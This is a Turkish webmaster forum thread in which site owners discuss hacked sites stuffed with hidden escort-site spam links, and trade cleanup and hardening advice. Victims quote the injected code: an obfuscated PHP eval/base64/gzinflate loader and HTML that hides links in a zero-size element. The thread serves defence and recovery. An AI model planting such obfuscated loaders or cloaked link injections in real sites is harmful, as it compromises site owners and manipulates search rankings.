• 16-03-2017, 02:30:22
    #10
    OceanSpray adlı üyeden alıntı: mesajı görüntüle
    Öncelikle GSC üzerinden güvenlik sorunları sekmesinde bir bildirim olup olmadığını kontrol edin. Eğer varsa düzelttiğinize dair geri bildirimde bulunabilirsiniz. Sitenizi ve sunucunuzu gözden geçirip açıkları kapattığınızdan emin olun.
    Dediğiniz yerde herhangi bir bildirim yok. Başka yapabileceğimiz birşey yok mu. Google'a bunun saldırı sonucunda eklenmiş linkler olduğunu nasıl iletebiliriz. Site resmen çakıldı bu linkler yüzünden.
  • 16-03-2017, 03:17:59
    #11
    Aynı dertten bende muzdaribim.

    <?php function yVlA($bVn)
    {
    $bVn=gzinflate(base64_decode($bVn));
    for($i=0;$i<strlen($bVn);$i++)
    {
    $bVn[$i] = chr(ord($bVn[$i])-1);
    }
    return $bVn;
    }eval(yVlA("U1QEAj7utJTMAkXH9KzctISMtNKElIL80rT80h JN5czS0kJrA4OqpJyk3KTUrLySrOos/ZSCPIPcrPycEjCpX1pZqqxlw8ftYA8A"));?>

    Eklenilen kod bu. 5 adet ***** sitesinin linki olduğunu farkettim, wmaracı sayesinde..

    Bu kodu nasıl çözebilirim fikri olan var mı?
  • 16-03-2017, 03:52:53
    #12
    Öncelikle sunucunuzdaki FTP Loglarını kontrol edin, sonrasında Gereksiz eklenti ve tema dosyalarınıza bakın en son olarak Sunucunuzun diğer sitelerinden, sitenize gelebilmesini engelleyin. Genellikle Shell ve JS kodları ile müdahale ediliyor.
  • 17-03-2017, 12:37:26
    #13
    Bize de eklenen kod. Günlük ben bakarım. Bir ara eklemişlerdi şu kodları. Eğer bu forumdaysalar allah belalarını versin. ÜZerimden kazandıkları 2 kuruş parada boğazlarından geçemesin. süründürsün

    orrrrrrr..... cccoo......ları.

    <font style="overflow: auto; position: absolute; height: 0pt; width: 0pt"><a href="http://www.bursalike.com/" target="_blank" title="bursa ******">bursa ******</a> <a href="http://www.mersintaxi.com/" target="_blank" title="mersin ******">mersin ******</a> <a href="http://www.mersinmaks.com/" target="_blank" title="mersin ******">mersin ******</a> <a href="http://www.mersinhamburger.com/" target="_blank" title="mersin ******">mersin ******</a></font>
  • 18-03-2017, 17:01:28
    #14
    Siteme habersiz eklenen Saldırı amaçlı 3 adet +18 link için (display:none ile eklenmiş) webmaster toalsdan uyarı dahi almadım. Bu noktadan sonra şunu anladım ki, Google algoritması; bir linkin site sahibinden habersiz hacklink olarak eklendiğini anlayamayacak kadar ahmak ve gerizekalı.

    Yani bu şu anlama geliyor. Hacklink kasın nasılsa anlamıyorlar google botu!
  • 22-03-2017, 08:25:11
    #15
    Hocam aynı durum 2 ay önce benimde başıma geldi. Display:none komutuyla esco....rt sitelerinin linkleri eklenmişti. 25K'lık sitem 10K'lara geriledi %50 kaybın nasıl bir his olduğunu bilirsiniz.

    esco....rt site:siteismi.com yazdığımda önceden tüm sayfalarım çıkıyordu yavaş yavaş indexler siliniyor şuanda site de düzelecek gibi bir miktar artış yakaladı gibi.

    Bu süreçte FTP'sinden, Site adminine, DB'ye kadar tüm şifreleri değiştirin, sitenizde gereksiz tüm eklentileri kaldırın ve güncelleyin. Son olarak wpscan ile sitenizdeki açıkları bulmaya çalışın.

    Sonrası için indexlerin silinip düzelmesini ümit edin. Ben bu aşamadayım şuan.
  • 22-03-2017, 10:22:33
    #16
    Arkadaşlar WP altyapısı kullanıyorsanız güvenlik eklentileri paylaşabilir misiniz?
  • 22-03-2017, 12:36:20
    #17
    wordpress için Activity Log ve LockdownWP eklentilerini kullanıyorum.Activity log eklentisi admin ve kayıtlı kullanıcı işlemlerini kayıt altına alıyor.Lockdown wp ise admin panel yolunu değiştiriyor.İkisini de güvenlik için kullanıyorum.

    yektapoyraz adlı üyeden alıntı: mesajı görüntüle
    Arkadaşlar WP altyapısı kullanıyorsanız güvenlik eklentileri paylaşabilir misiniz?
  • 24-05-2017, 14:08:08
    #18
    ufak bir satış sitemiz var adamlar bize dadandı. index.php'ye koyuyorlardı şimdi nereye ekledilerse linki silemiyorum. Opencart 1.5.6 kullanıyorum ?
    base64 ve eval olarak sublimetext'de dosyaları taradım bir şey çıkmadı yardımcı olur musunuz ?